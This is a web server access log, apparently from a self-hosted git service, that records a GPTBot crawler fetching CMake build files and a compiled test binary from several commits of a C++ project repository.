"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21643] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10224] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21647] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14295] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11825] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11264] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11193] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16920] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14306] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11024] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39747] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10176] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16401] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11518] [Gzip 